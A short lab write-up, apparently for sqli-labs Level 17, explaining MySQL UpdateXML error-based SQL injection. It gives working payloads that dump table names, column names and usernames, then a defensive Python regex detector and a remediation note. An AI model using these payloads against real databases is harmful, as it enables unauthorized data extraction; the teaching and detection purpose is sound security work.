Level 17:
UpdateXML(xml_target, xpath_expr, new_xml)
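Here xml_target is the target XML document, xpath_expr is the XPath expression, and new_xml is the XML content to substitute in. The function can be used for injection because an xpath_expr that is not valid XPath makes MySQL raise an error, and that error message quotes the invalid expression, which is what makes error-based injection possible.
The password field is found to be an injection point.
1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3)#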
uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(username) from(select username from users)a),1),3)#&submit=Submit
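For the defensive side, a detection check for this pattern in form-encoded request bodies follows. It is an added example, not part of the original write-up: the names scan_body and normalize are hypothetical, and every sample body in the test data other than the request shown above is constructed.

```python
import re
from urllib.parse import parse_qsl

# MySQL XML functions whose XPath-syntax error quotes the offending expression.
XPATH_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Signs that the XPath argument is built from query results, not a constant.
DATA_SOURCE = re.compile(
    r"\b(select|concat|group_concat|information_schema|database\s*\(|version\s*\()",
    re.I,
)
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # body is executed by MySQL
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)            # acts as whitespace


def normalize(value: str) -> str:
    """Undo comment-based obfuscation and collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value)


def scan_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, function) pairs where a parameter calls an
    XPath-error function with a query-derived argument."""
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = normalize(raw)
        match = XPATH_FUNCS.search(value)
        if match and DATA_SOURCE.search(value[match.end():]):
            findings.append((name, match.group(1).lower()))
    return findings


# The request from this page, followed by constructed samples.
PAGE_REQUEST = ("uname=admin&passwd=1' and updatexml(1,concat(1,(select "
                "group_concat(username) from(select username from users)a),1),3)"
                "#&submit=Submit")
ENCODED_VARIANT = ("uname=admin&passwd=1%27+and+UpdateXML/**/(1,concat(1,"
                   "(select+database())),3)%23&submit=Submit")
BENIGN = "uname=admin&passwd=S3cure%21pass&submit=Submit"
BENIGN_WORD = "uname=admin&passwd=updatexml&submit=Submit"

if __name__ == "__main__":
    for body in (PAGE_REQUEST, ENCODED_VARIANT, BENIGN, BENIGN_WORD):
        print(scan_body(body))
```

A match is a lead for log review or a WAF rule, not a fix; the fix is a parameterized UPDATE statement and suppressing database error text in responses.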
End